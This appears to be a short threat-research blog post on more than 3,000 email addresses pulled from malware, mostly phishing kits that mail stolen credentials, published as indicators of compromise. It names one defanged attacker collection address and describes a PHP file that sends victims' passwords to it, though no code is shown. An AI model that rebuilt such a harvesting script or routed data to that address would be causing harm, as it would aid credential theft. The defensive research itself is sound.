An Analysis of 3,000 Malware Email Addresses
While analyzing malware 24/7, we decided to continue our collection of email addresses found in malicious code. With the help of SiteLock's Sig Q Team we tripled our existing collection of malware email addresses to over 3,000. Looking at the data we get to see the prefered email providers of phishers, key words in malicious email addresses, and the spoofed From: addresses used by bad actors. Finally, we capitalized on a test address and unregistered domain to get a look inside the end of the phishing process.
The full list of 3,060 email addresses list is on GitHub and can be used as indicators of compromise, particularly for website security. The list mainly consists of phishing addresses, with addresses from web shells, defacements, and other miscellaneous files rounding out the 3,000.
The majority of email addresses were collected from phishing infections -- disposable email addresses used to receive pilfered credentials. Below is an example of a phishing infection. It's a PHP file written or uploaded to a site that collects and sends unwary victims' email addresses and passwords to the malicious actors email address, hopful101@zoho[.]com.